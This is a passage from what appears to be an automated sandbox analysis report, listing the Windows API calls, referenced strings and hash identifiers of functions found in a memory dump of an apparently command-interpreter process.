                                                                      • EnterCriticalSection.API-MS-WIN-CORE-SYNCH-L1-1-0(?,?,?,?,000587E5,00000000,?,00044A0A), ref: 00064897
                                                                      • LeaveCriticalSection.API-MS-WIN-CORE-SYNCH-L1-1-0(?,?,?,?,000587E5,00000000,?,00044A0A), ref: 000648AD
                                                                      Memory Dump Source
                                                                      • Source File: 00000007.00000002.1592745887.0000000000041000.00000020.00000001.01000000.00000006.sdmp, Offset: 00040000, based on PE: true
                                                                      • Associated: 00000007.00000002.1592729053.0000000000040000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                      • Associated: 00000007.00000002.1592771799.000000000006E000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                      • Associated: 00000007.00000002.1592793117.000000000008A000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                      • Associated: 00000007.00000002.1592793117.000000000008E000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_7_2_40000_alpha.jbxd
                                                                      Similarity
                                                                      • API ID: CriticalSection$BufferConsoleEnterFileFlushHandleInputLeaveType_get_osfhandle_getch
                                                                      • String ID:
                                                                      • API String ID: 491502236-0
                                                                      • Opcode ID: e9dc111819dc48992bd74bfa7b7db3d2f8b70987400dfa1866574633fa8f5c0a
                                                                      • Instruction ID: 09a3e862e7418d1e0d2c049445c95ea48c8290195958120ac39eb4829800d65c
                                                                      • Opcode Fuzzy Hash: e9dc111819dc48992bd74bfa7b7db3d2f8b70987400dfa1866574633fa8f5c0a
                                                                      • Instruction Fuzzy Hash: C801D471504360AFFB146BA0EC0EB9E3BA5EF02720F10012AF945961A1DF7D9980CB65
                                                                      APIs
                                                                        • Part of subcall function 00046513: memset.MSVCRT ref: 00046593
                                                                        • Part of subcall function 0004DC60: GetProcessHeap.API-MS-WIN-CORE-HEAP-L1-1-0(00000000,?,00000000,?,00000000,00048E86,00048E5A,00000000), ref: 0004DC98
                                                                        • Part of subcall function 0004DC60: RtlFreeHeap.NTDLL(00000000), ref: 0004DC9F
                                                                      • memset.MSVCRT ref: 0005A097
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000007.00000002.1592745887.0000000000041000.00000020.00000001.01000000.00000006.sdmp, Offset: 00040000, based on PE: true
                                                                      • Associated: 00000007.00000002.1592729053.0000000000040000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                      • Associated: 00000007.00000002.1592771799.000000000006E000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                      • Associated: 00000007.00000002.1592793117.000000000008A000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                      • Associated: 00000007.00000002.1592793117.000000000008E000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_7_2_40000_alpha.jbxd
                                                                      Similarity
                                                                      • API ID: Heapmemset$FreeProcess
                                                                      • String ID: *.*
                                                                      • API String ID: 1291122668-438819550
                                                                      • Opcode ID: b4359efe63a5c85eb8fff555399eec35d103151b1e58cd33a2ba9d911bfc4235
                                                                      • Instruction ID: 8d31cf54ceb872109561adeb8085f61ac5baff0b4ba17097508a3c0a9a5911d6
                                                                      • Opcode Fuzzy Hash: b4359efe63a5c85eb8fff555399eec35d103151b1e58cd33a2ba9d911bfc4235
                                                                      • Instruction Fuzzy Hash: F8B1BEB1E002059BCF64DFA8C882AEFB7B5EF5A701F144269EC05AB242E731DD45CB95
                                                                      APIs
                                                                      • RegEnumKeyExW.API-MS-WIN-CORE-REGISTRY-L1-1-0(?,00000000,?,?,00000000,00000000,00000000,00000000), ref: 00065997
                                                                        • Part of subcall function 0004AB7F: iswspace.MSVCRT ref: 0004AB8D
                                                                        • Part of subcall function 0004AB7F: wcschr.MSVCRT ref: 0004AB9E
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000007.00000002.1592745887.0000000000041000.00000020.00000001.01000000.00000006.sdmp, Offset: 00040000, based on PE: true
                                                                      • Associated: 00000007.00000002.1592729053.0000000000040000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                      • Associated: 00000007.00000002.1592771799.000000000006E000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                      • Associated: 00000007.00000002.1592793117.000000000008A000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                      • Associated: 00000007.00000002.1592793117.000000000008E000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_7_2_40000_alpha.jbxd
                                                                      Similarity
                                                                      • API ID: Enumiswspacewcschr
                                                                      • String ID: %s=%s$\Shell\Open\Command
                                                                      • API String ID: 3493821229-3301834661
                                                                      • Opcode ID: 83ac439f15dd0936d92432c84cdffb8f519c17430c342a032bc9c4036ec8dd9a
                                                                      • Instruction ID: 06245e1625d28b87f3f64744cee791934e1c030b99c3501610faad42b594a814
                                                                      • Opcode Fuzzy Hash: 83ac439f15dd0936d92432c84cdffb8f519c17430c342a032bc9c4036ec8dd9a
                                                                      • Instruction Fuzzy Hash: 48814BB1E006195BDB349B68CC95BFE73BBEF84701F1441B9E40A97241EB709E81CB95
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000007.00000002.1592745887.0000000000041000.00000020.00000001.01000000.00000006.sdmp, Offset: 00040000, based on PE: true
                                                                      • Associated: 00000007.00000002.1592729053.0000000000040000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                      • Associated: 00000007.00000002.1592771799.000000000006E000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                      • Associated: 00000007.00000002.1592793117.000000000008A000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                      • Associated: 00000007.00000002.1592793117.000000000008E000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_7_2_40000_alpha.jbxd
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID: GeToken: (%x) '%s'$Ungetting: '%s'
                                                                      • API String ID: 0-1704545398
                                                                      • Opcode ID: abd34010544c0ce127d61ec00e7b6f7f34e15cd63c229571aa42374a96d3dc89
                                                                      • Instruction ID: 02d83750b37eb5cd9bf11823a65e552da1f2285d20fdeb1144e010ab75233c8b
                                                                      • Opcode Fuzzy Hash: abd34010544c0ce127d61ec00e7b6f7f34e15cd63c229571aa42374a96d3dc89
                                                                      • Instruction Fuzzy Hash: 6D515CF1E0110296FBF47F64D845FBA36A2FB50314F14403AD8479B292EBB99C84C79A
                                                                      APIs
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000007.00000002.1592745887.0000000000041000.00000020.00000001.01000000.00000006.sdmp, Offset: 00040000, based on PE: true
                                                                      • Associated: 00000007.00000002.1592729053.0000000000040000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                      • Associated: 00000007.00000002.1592771799.000000000006E000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                      • Associated: 00000007.00000002.1592793117.000000000008A000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                      • Associated: 00000007.00000002.1592793117.000000000008E000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_7_2_40000_alpha.jbxd
                                                                      Similarity
                                                                      • API ID: iswdigit$wcstol
                                                                      • String ID: aApP
                                                                      • API String ID: 644763121-2547155087
                                                                      • Opcode ID: 1ca208865ad37f7b0c7149d3bbca93c9a8cd45259e22be6ea2bdc931b35a8f1a
                                                                      • Instruction ID: 94123003615cb27910f495296a463ae1645ab3360e55dbdb0c3ad2a56d2b203b
                                                                      • Opcode Fuzzy Hash: 1ca208865ad37f7b0c7149d3bbca93c9a8cd45259e22be6ea2bdc931b35a8f1a
                                                                      • Instruction Fuzzy Hash: D0410575B0022286DF64DF68C8916BFB3E6FF95700B15443AE946DB281EA36DD42C3A1
                                                                      APIs
                                                                      • memset.MSVCRT ref: 0006B25E
                                                                        • Part of subcall function 0004E3F0: memset.MSVCRT ref: 0004E455
                                                                      • _wcslwr.MSVCRT ref: 0006B2D2
                                                                      • ??_V@YAXPAX@Z.MSVCRT(00000000,-00000001,?,?,?), ref: 0006B30B
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000007.00000002.1592745887.0000000000041000.00000020.00000001.01000000.00000006.sdmp, Offset: 00040000, based on PE: true
                                                                      • Associated: 00000007.00000002.1592729053.0000000000040000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                      • Associated: 00000007.00000002.1592771799.000000000006E000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                      • Associated: 00000007.00000002.1592793117.000000000008A000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                      • Associated: 00000007.00000002.1592793117.000000000008E000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_7_2_40000_alpha.jbxd
                                                                      Similarity
                                                                      • API ID: memset$_wcslwr
                                                                      • String ID: [%s]
                                                                      • API String ID: 886762496-302437576
                                                                      • Opcode ID: 735e6a0130cefc7350e62052df9b91b8148feed1cec17ea7a6278364b18a7b6b
                                                                      • Instruction ID: 0e2c720ab30570666b44943680d266d81c5b20f4325835117903ea435218cee2
                                                                      • Opcode Fuzzy Hash: 735e6a0130cefc7350e62052df9b91b8148feed1cec17ea7a6278364b18a7b6b
                                                                      • Instruction Fuzzy Hash: 683182B1B0021A6BDB10DBA9D8D5BEEB7F9AF19314F040069E505E3242DB78DE848B50
                                                                      APIs
                                                                        • Part of subcall function 00049E8E: iswspace.MSVCRT ref: 00049E9E
                                                                      • iswspace.MSVCRT ref: 00049E28
                                                                      • _wcsnicmp.MSVCRT ref: 00049E79
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000007.00000002.1592745887.0000000000041000.00000020.00000001.01000000.00000006.sdmp, Offset: 00040000, based on PE: true
                                                                       • Associated: 00000007.00000002.1592729053.0000000000040000.00000002.00000001.01000000.00000006.sdmp
                                                                       • Associated: 00000007.00000002.1592771799.000000000006E000.00000004.00000001.01000000.00000006.sdmp
                                                                       • Associated: 00000007.00000002.1592793117.000000000008A000.00000002.00000001.01000000.00000006.sdmp
                                                                       • Associated: 00000007.00000002.1592793117.000000000008E000.00000002.00000001.01000000.00000006.sdmp
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_7_2_40000_alpha.jbxd
                                                                      Similarity
                                                                      • API ID: iswspace$_wcsnicmp
                                                                      • String ID: off
                                                                      • API String ID: 3989682491-733764931
                                                                      • Opcode ID: d2be550b245426ee82989c096093cf2a276904d170792ddfd54f646db7cd44f6
                                                                      • Instruction ID: 855a1f1737e0d331c6dceca596edf943e70e324b04b3b13a5b00adecd6e12c38
                                                                      • Opcode Fuzzy Hash: d2be550b245426ee82989c096093cf2a276904d170792ddfd54f646db7cd44f6
                                                                      • Instruction Fuzzy Hash: 831108F1704311AAEB74E2AB5C1AB3F52949BC1B69B29003EFD46D70C1EA458D41D1A9
                                                                      APIs
                                                                        • Part of subcall function 0005727B: __iob_func.MSVCRT ref: 00057280
                                                                      • fprintf.MSVCRT ref: 00065182
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000007.00000002.1592745887.0000000000041000.00000020.00000001.01000000.00000006.sdmp, Offset: 00040000, based on PE: true
                                                                       • Associated: 00000007.00000002.1592729053.0000000000040000.00000002.00000001.01000000.00000006.sdmp
                                                                       • Associated: 00000007.00000002.1592771799.000000000006E000.00000004.00000001.01000000.00000006.sdmp
                                                                       • Associated: 00000007.00000002.1592793117.000000000008A000.00000002.00000001.01000000.00000006.sdmp
                                                                       • Associated: 00000007.00000002.1592793117.000000000008E000.00000002.00000001.01000000.00000006.sdmp
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_7_2_40000_alpha.jbxd
                                                                      Similarity
                                                                      • API ID: __iob_funcfprintf
                                                                      • String ID: CMD Internal Error %s$%s$Null environment
                                                                      • API String ID: 620453056-2781220306
                                                                      • Opcode ID: 315c8b437262163d97b56be2caf99327b94cd010300c7c3d7f41ddb23c660fd2
                                                                      • Instruction ID: 40264e50666708b131de604079db3a29a173909bdee120827997900a73341069
                                                                      • Opcode Fuzzy Hash: 315c8b437262163d97b56be2caf99327b94cd010300c7c3d7f41ddb23c660fd2
                                                                      • Instruction Fuzzy Hash: 4D01FE37A40F029AD7343B5CBC02BA373A1DBD2322B15053BED9E9B140F6A05D428184
                                                                      APIs
                                                                      • GetModuleHandleW.API-MS-WIN-CORE-LIBRARYLOADER-L1-2-0(ntdll.dll), ref: 0006351B
                                                                      • GetProcAddress.API-MS-WIN-CORE-LIBRARYLOADER-L1-2-0(00000000,RtlDllShutdownInProgress), ref: 0006352C
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000007.00000002.1592745887.0000000000041000.00000020.00000001.01000000.00000006.sdmp, Offset: 00040000, based on PE: true
                                                                       • Associated: 00000007.00000002.1592729053.0000000000040000.00000002.00000001.01000000.00000006.sdmp
                                                                       • Associated: 00000007.00000002.1592771799.000000000006E000.00000004.00000001.01000000.00000006.sdmp
                                                                       • Associated: 00000007.00000002.1592793117.000000000008A000.00000002.00000001.01000000.00000006.sdmp
                                                                       • Associated: 00000007.00000002.1592793117.000000000008E000.00000002.00000001.01000000.00000006.sdmp
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_7_2_40000_alpha.jbxd
                                                                      Similarity
                                                                      • API ID: AddressHandleModuleProc
                                                                      • String ID: RtlDllShutdownInProgress$ntdll.dll
                                                                      • API String ID: 1646373207-582119455
                                                                      • Opcode ID: 1537cf8e5519e70c1e0809c694202cdaac210af46bd9499073e5e6dcdafaaaa2
                                                                      • Instruction ID: b3c3c38888fff84b1be9d361fed1a0a4bea1ebded06b831d90f117db5c0c3888
                                                                      • Opcode Fuzzy Hash: 1537cf8e5519e70c1e0809c694202cdaac210af46bd9499073e5e6dcdafaaaa2
                                                                      • Instruction Fuzzy Hash: D7E09231B01B308BBF616B34BD0855A3BD5B745B603051056E84ADB211D7688D418FD1
                                                                      APIs
                                                                      • GetModuleHandleW.API-MS-WIN-CORE-LIBRARYLOADER-L1-2-0(kernelbase.dll), ref: 000638FB
                                                                      • GetProcAddress.API-MS-WIN-CORE-LIBRARYLOADER-L1-2-0(00000000,RaiseFailFastException), ref: 00063907
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000007.00000002.1592745887.0000000000041000.00000020.00000001.01000000.00000006.sdmp, Offset: 00040000, based on PE: true
                                                                       • Associated: 00000007.00000002.1592729053.0000000000040000.00000002.00000001.01000000.00000006.sdmp
                                                                       • Associated: 00000007.00000002.1592771799.000000000006E000.00000004.00000001.01000000.00000006.sdmp
                                                                       • Associated: 00000007.00000002.1592793117.000000000008A000.00000002.00000001.01000000.00000006.sdmp
                                                                       • Associated: 00000007.00000002.1592793117.000000000008E000.00000002.00000001.01000000.00000006.sdmp
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_7_2_40000_alpha.jbxd
                                                                      Similarity
                                                                      • API ID: AddressHandleModuleProc
                                                                      • String ID: RaiseFailFastException$kernelbase.dll
                                                                      • API String ID: 1646373207-919018592
                                                                      • Opcode ID: 0e1b9a07d04cef478f88872ea2c9698ee73fd56e49bd31844bdbf3210366cce3
                                                                      • Instruction ID: 4c624293a6ae3176bb11bd7a474a6dffbfa190a62e8448590bef37697a980818
                                                                      • Opcode Fuzzy Hash: 0e1b9a07d04cef478f88872ea2c9698ee73fd56e49bd31844bdbf3210366cce3
                                                                      • Instruction Fuzzy Hash: 97E0C272640328BB9F211FA1DC0DC8FBF29FB457B17000022FA0886520CA7AC910CFE1
                                                                      APIs
                                                                      Memory Dump Source
                                                                      • Source File: 00000007.00000002.1592745887.0000000000041000.00000020.00000001.01000000.00000006.sdmp, Offset: 00040000, based on PE: true
                                                                       • Associated: 00000007.00000002.1592729053.0000000000040000.00000002.00000001.01000000.00000006.sdmp
                                                                       • Associated: 00000007.00000002.1592771799.000000000006E000.00000004.00000001.01000000.00000006.sdmp
                                                                       • Associated: 00000007.00000002.1592793117.000000000008A000.00000002.00000001.01000000.00000006.sdmp
                                                                       • Associated: 00000007.00000002.1592793117.000000000008E000.00000002.00000001.01000000.00000006.sdmp
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_7_2_40000_alpha.jbxd
                                                                      Similarity
                                                                      • API ID: _wcsnicmp$wcschr
                                                                      • String ID:
                                                                      • API String ID: 3270668897-0
                                                                      • Opcode ID: e2120f48f032633bab48fd5f96371964f173ae32302ea74355a05a99c445970b
                                                                      • Instruction ID: ce96962da4c440c8eac5f0c86aca9c44c5c57daaf1850f22e1c912d7b11b3b9a
                                                                      • Opcode Fuzzy Hash: e2120f48f032633bab48fd5f96371964f173ae32302ea74355a05a99c445970b
                                                                      • Instruction Fuzzy Hash: 365159797003159FEB64EB688851A7F77E5EF85705B14402DEC829B282EBB44E42C3D6
                                                                      APIs
                                                                      • SetErrorMode.API-MS-WIN-CORE-ERRORHANDLING-L1-1-0(00000000,00000000,?,00000000,00000000,?,?,?,000480F4,00000000,00000000,-00000001,00000000,?,00000000), ref: 00051D3A
                                                                      • SetErrorMode.API-MS-WIN-CORE-ERRORHANDLING-L1-1-0(00000001,?,000480F4,00000000,00000000,-00000001,00000000,?,00000000), ref: 00051D44
                                                                      • GetFullPathNameW.API-MS-WIN-CORE-FILE-L1-1-0(00000000,-00000001,?,00000000,?,000480F4,00000000,00000000,-00000001,00000000,?,00000000), ref: 00051D57
                                                                      • SetErrorMode.API-MS-WIN-CORE-ERRORHANDLING-L1-1-0(00000000,?,000480F4,00000000,00000000,-00000001,00000000,?,00000000), ref: 00051D61
                                                                      Memory Dump Source
                                                                      • Source File: 00000007.00000002.1592745887.0000000000041000.00000020.00000001.01000000.00000006.sdmp, Offset: 00040000, based on PE: true
                                                                       • Associated: 00000007.00000002.1592729053.0000000000040000.00000002.00000001.01000000.00000006.sdmp
                                                                       • Associated: 00000007.00000002.1592771799.000000000006E000.00000004.00000001.01000000.00000006.sdmp
                                                                       • Associated: 00000007.00000002.1592793117.000000000008A000.00000002.00000001.01000000.00000006.sdmp
                                                                       • Associated: 00000007.00000002.1592793117.000000000008E000.00000002.00000001.01000000.00000006.sdmp
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_7_2_40000_alpha.jbxd
                                                                      Similarity
                                                                      • API ID: ErrorMode$FullNamePath
                                                                      • String ID:
                                                                      • API String ID: 268959451-0
                                                                      • Opcode ID: 74859a88626658e6fb8056ac0dd4815702165dfb3cb8fde157b6ba111d05ee39
                                                                      • Instruction ID: d31f6165e3463f24ef782e805c2952c6c4236777a5e74139351b661a82baf4bc
                                                                      • Opcode Fuzzy Hash: 74859a88626658e6fb8056ac0dd4815702165dfb3cb8fde157b6ba111d05ee39
                                                                      • Instruction Fuzzy Hash: 34315A79100101ABDB38DF68C855ABFB3B5EF44301728892DED468B290E779AE49C750
                                                                      APIs
                                                                      • GetProcessHeap.API-MS-WIN-CORE-HEAP-L1-1-0(00000000,?,00000000,00000000,00000000,00000000,00000000), ref: 0004C5BD
                                                                      • RtlFreeHeap.NTDLL(00000000), ref: 0004C5C4
                                                                      • _setjmp3.MSVCRT ref: 0004C630
                                                                      • VirtualFree.API-MS-WIN-CORE-MEMORY-L1-1-0(?,00000000,00008000,00000000,00000000,00000000,00000000,00000000), ref: 0004C69D
                                                                      Memory Dump Source
                                                                      • Source File: 00000007.00000002.1592745887.0000000000041000.00000020.00000001.01000000.00000006.sdmp, Offset: 00040000, based on PE: true
                                                                       • Associated: 00000007.00000002.1592729053.0000000000040000.00000002.00000001.01000000.00000006.sdmp
                                                                       • Associated: 00000007.00000002.1592771799.000000000006E000.00000004.00000001.01000000.00000006.sdmp
                                                                       • Associated: 00000007.00000002.1592793117.000000000008A000.00000002.00000001.01000000.00000006.sdmp
                                                                       • Associated: 00000007.00000002.1592793117.000000000008E000.00000002.00000001.01000000.00000006.sdmp
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_7_2_40000_alpha.jbxd
                                                                      Similarity
                                                                      • API ID: FreeHeap$ProcessVirtual_setjmp3
                                                                      • String ID:
                                                                      • API String ID: 2613391085-0
                                                                      • Opcode ID: 81334028ae59c6c0b54de96bbbc27c511fa88b2fa536f1b853f084cc39364d1a
                                                                      • Instruction ID: b9be5693ac97178bb3cc43347b784aee18c7af8034d22d675aba505f972eb8d3
                                                                      • Opcode Fuzzy Hash: 81334028ae59c6c0b54de96bbbc27c511fa88b2fa536f1b853f084cc39364d1a
                                                                      • Instruction Fuzzy Hash: DC3180B0F06A018BFB94DF68D845B5A77E4F744744F15803AD80EE7250D77E9884CBA9
                                                                      APIs
                                                                      • RegOpenKeyExW.API-MS-WIN-CORE-REGISTRY-L1-1-0(?,?,00000000,00000001,?,0006CD20,0000001C,000658DF), ref: 000662E6
                                                                      • RegQueryValueExW.API-MS-WIN-CORE-REGISTRY-L1-1-0(?,00000000,00000000,?,00000000,?,0006CD20,0000001C,000658DF), ref: 00066301
                                                                      • RegQueryValueExW.API-MS-WIN-CORE-REGISTRY-L1-1-0(?,00000000,00000000,?,00000000,?), ref: 00066340
                                                                      • SetLastError.API-MS-WIN-CORE-ERRORHANDLING-L1-1-0(00000000), ref: 0006635D
                                                                      Memory Dump Source
                                                                      • Source File: 00000007.00000002.1592745887.0000000000041000.00000020.00000001.01000000.00000006.sdmp, Offset: 00040000, based on PE: true
                                                                       • Associated: 00000007.00000002.1592729053.0000000000040000.00000002.00000001.01000000.00000006.sdmp
                                                                       • Associated: 00000007.00000002.1592771799.000000000006E000.00000004.00000001.01000000.00000006.sdmp
                                                                       • Associated: 00000007.00000002.1592793117.000000000008A000.00000002.00000001.01000000.00000006.sdmp
                                                                       • Associated: 00000007.00000002.1592793117.000000000008E000.00000002.00000001.01000000.00000006.sdmp
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_7_2_40000_alpha.jbxd
                                                                      Similarity
                                                                      • API ID: QueryValue$ErrorLastOpen
                                                                      • String ID:
                                                                      • API String ID: 4270309053-0
                                                                      • Opcode ID: 58a070adb72c5ebb81aec38723dee2421809d22f37c51203debe866f746b1eb3
                                                                      • Instruction ID: 04ced80124c30dd2cadbb51989231254791e7ab0360106cecc80a6c2b93928b1
                                                                      • Opcode Fuzzy Hash: 58a070adb72c5ebb81aec38723dee2421809d22f37c51203debe866f746b1eb3
                                                                      • Instruction Fuzzy Hash: 392131B1E01229AFEB209FD8DC919EEB6FDFB49750F14412AE501F3241D7769D008BA5
                                                                      APIs
                                                                      • wcstol.MSVCRT ref: 00052977
                                                                      • wcstol.MSVCRT ref: 00052987
                                                                      • lstrcmpW.API-MS-WIN-CORE-STRING-OBSOLETE-L1-1-0(?,?,?,0004E559,?,?,00000000,?), ref: 000529FF
                                                                      • lstrcmpiW.API-MS-WIN-CORE-STRING-OBSOLETE-L1-1-0(?,?,?,0004E559,?,?,00000000,?), ref: 00052A09
                                                                      Memory Dump Source
                                                                      • Source File: 00000007.00000002.1592745887.0000000000041000.00000020.00000001.01000000.00000006.sdmp, Offset: 00040000, based on PE: true
                                                                       • Associated: 00000007.00000002.1592729053.0000000000040000.00000002.00000001.01000000.00000006.sdmp
                                                                       • Associated: 00000007.00000002.1592771799.000000000006E000.00000004.00000001.01000000.00000006.sdmp
                                                                       • Associated: 00000007.00000002.1592793117.000000000008A000.00000002.00000001.01000000.00000006.sdmp
                                                                       • Associated: 00000007.00000002.1592793117.000000000008E000.00000002.00000001.01000000.00000006.sdmp
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_7_2_40000_alpha.jbxd
                                                                      Similarity
                                                                      • API ID: wcstol$lstrcmplstrcmpi
                                                                      • String ID:
                                                                      • API String ID: 4273384694-0
                                                                      • Opcode ID: 247a140bdd6b99a0ec45ddad87a945cefb470e53e903456b860bba6c87f6bf89
                                                                      • Instruction ID: 8347f7254bdf11959b796def4c79d614a9534eaf021417125f015378a1ea281a
                                                                      • Opcode Fuzzy Hash: 247a140bdd6b99a0ec45ddad87a945cefb470e53e903456b860bba6c87f6bf89
                                                                      • Instruction Fuzzy Hash: A4110332900126BB9B765B788A0C97FBBA8FF03352F160210EC01E7B10D365ED58E6E1
                                                                      APIs
                                                                      • memset.MSVCRT ref: 0006C56B
                                                                        • Part of subcall function 0004E3F0: memset.MSVCRT ref: 0004E455
                                                                      • GetVolumePathNameW.API-MS-WIN-CORE-FILE-L1-1-0(00000000,00000000,00000001,-00000001,00000001,00000000,00000000), ref: 0006C5A5
                                                                      • GetDriveTypeW.API-MS-WIN-CORE-FILE-L1-1-0(00000000), ref: 0006C5BD
                                                                      • ??_V@YAXPAX@Z.MSVCRT(00000000,-00000001,00000001,00000000,00000000), ref: 0006C5DA
                                                                      Memory Dump Source
                                                                      • Source File: 00000007.00000002.1592745887.0000000000041000.00000020.00000001.01000000.00000006.sdmp, Offset: 00040000, based on PE: true
                                                                       • Associated: 00000007.00000002.1592729053.0000000000040000.00000002.00000001.01000000.00000006.sdmp
                                                                       • Associated: 00000007.00000002.1592771799.000000000006E000.00000004.00000001.01000000.00000006.sdmp
                                                                       • Associated: 00000007.00000002.1592793117.000000000008A000.00000002.00000001.01000000.00000006.sdmp
                                                                       • Associated: 00000007.00000002.1592793117.000000000008E000.00000002.00000001.01000000.00000006.sdmp
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_7_2_40000_alpha.jbxd
                                                                      Similarity
                                                                      • API ID: memset$DriveNamePathTypeVolume
                                                                      • String ID:
                                                                      • API String ID: 1029679093-0
                                                                      • Opcode ID: 7f1cbfb180359b975b9c077ce6049a0a232d33880d987f802d3f63bc94240ff6
                                                                      • Instruction ID: b3a4af3c0c1164cd00c0dcbf2886f75d8b471232693ad2eaa15b8bdca3cf349f
                                                                      • Opcode Fuzzy Hash: 7f1cbfb180359b975b9c077ce6049a0a232d33880d987f802d3f63bc94240ff6
                                                                      • Instruction Fuzzy Hash: BA216371B002596BFB10DBA5DC89FBFBBF9FB44344F040469A545D3141D778EA848B61
                                                                      Memory Dump Source
                                                                      • Source File: 00000007.00000002.1592745887.0000000000041000.00000020.00000001.01000000.00000006.sdmp, Offset: 00040000, based on PE: true
                                                                       • Associated: 00000007.00000002.1592729053.0000000000040000.00000002.00000001.01000000.00000006.sdmp
                                                                       • Associated: 00000007.00000002.1592771799.000000000006E000.00000004.00000001.01000000.00000006.sdmp
                                                                       • Associated: 00000007.00000002.1592793117.000000000008A000.00000002.00000001.01000000.00000006.sdmp
                                                                       • Associated: 00000007.00000002.1592793117.000000000008E000.00000002.00000001.01000000.00000006.sdmp
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_7_2_40000_alpha.jbxd
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID:
                                                                      • API String ID:
                                                                      • Opcode ID: e641ab4dc69347192fbf3f04766778831f093cd16f886d5f1c398f3a2abf3687
                                                                      • Instruction ID: cf2a1ee146a6bd6b53edcc5fd07d89fde50a9dccde0d949e46947075c17befa0
                                                                      • Opcode Fuzzy Hash: e641ab4dc69347192fbf3f04766778831f093cd16f886d5f1c398f3a2abf3687
                                                                      • Instruction Fuzzy Hash: B3113431601504ABFB685B249C89FEF369AEF82328F14811AFC02C20D1DB74DD01CB91
                                                                      APIs
                                                                      • _get_osfhandle.MSVCRT ref: 00069822
                                                                      • WriteFile.API-MS-WIN-CORE-FILE-L1-1-0(00000000,000692EA,?,?,00000000,?,?,?,?,?,?,?,?,?,?,?), ref: 0006982A
                                                                      • GetLastError.API-MS-WIN-CORE-ERRORHANDLING-L1-1-0 ref: 00069841
                                                                      • DeleteFileW.API-MS-WIN-CORE-FILE-L1-1-0(?), ref: 0006986E
                                                                      Memory Dump Source
                                                                      • Source File: 00000007.00000002.1592745887.0000000000041000.00000020.00000001.01000000.00000006.sdmp, Offset: 00040000, based on PE: true
                                                                       • Associated: 00000007.00000002.1592729053.0000000000040000.00000002.00000001.01000000.00000006.sdmp
                                                                       • Associated: 00000007.00000002.1592771799.000000000006E000.00000004.00000001.01000000.00000006.sdmp
                                                                       • Associated: 00000007.00000002.1592793117.000000000008A000.00000002.00000001.01000000.00000006.sdmp
                                                                       • Associated: 00000007.00000002.1592793117.000000000008E000.00000002.00000001.01000000.00000006.sdmp
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_7_2_40000_alpha.jbxd
                                                                      Similarity
                                                                      • API ID: File$DeleteErrorLastWrite_get_osfhandle
                                                                      • String ID:
                                                                      • API String ID: 2448200120-0
                                                                      • Opcode ID: 8043f0f07f2cea82acb937b5b89ce61adab3834d4edfabb2015c7f3a96c7dda7
                                                                      • Instruction ID: 9ae0b7ef9b8bef4d3c2a113a88ff1d2b536daf1e0b6012817f76b106f5f44aca
                                                                      • Opcode Fuzzy Hash: 8043f0f07f2cea82acb937b5b89ce61adab3834d4edfabb2015c7f3a96c7dda7
                                                                      • Instruction Fuzzy Hash: 7611C471A00200AFEB299B65DC49ABF379EEB86B65F10402AF40697551DE7D9C80CB61
                                                                      APIs
                                                                      • GetProcessHeap.API-MS-WIN-CORE-HEAP-L1-1-0(00000000,?,00000000,?,00069962,00000000,?,00000000,0005CF94,00000000,?), ref: 0004727F
                                                                      • RtlFreeHeap.NTDLL(00000000), ref: 00047286
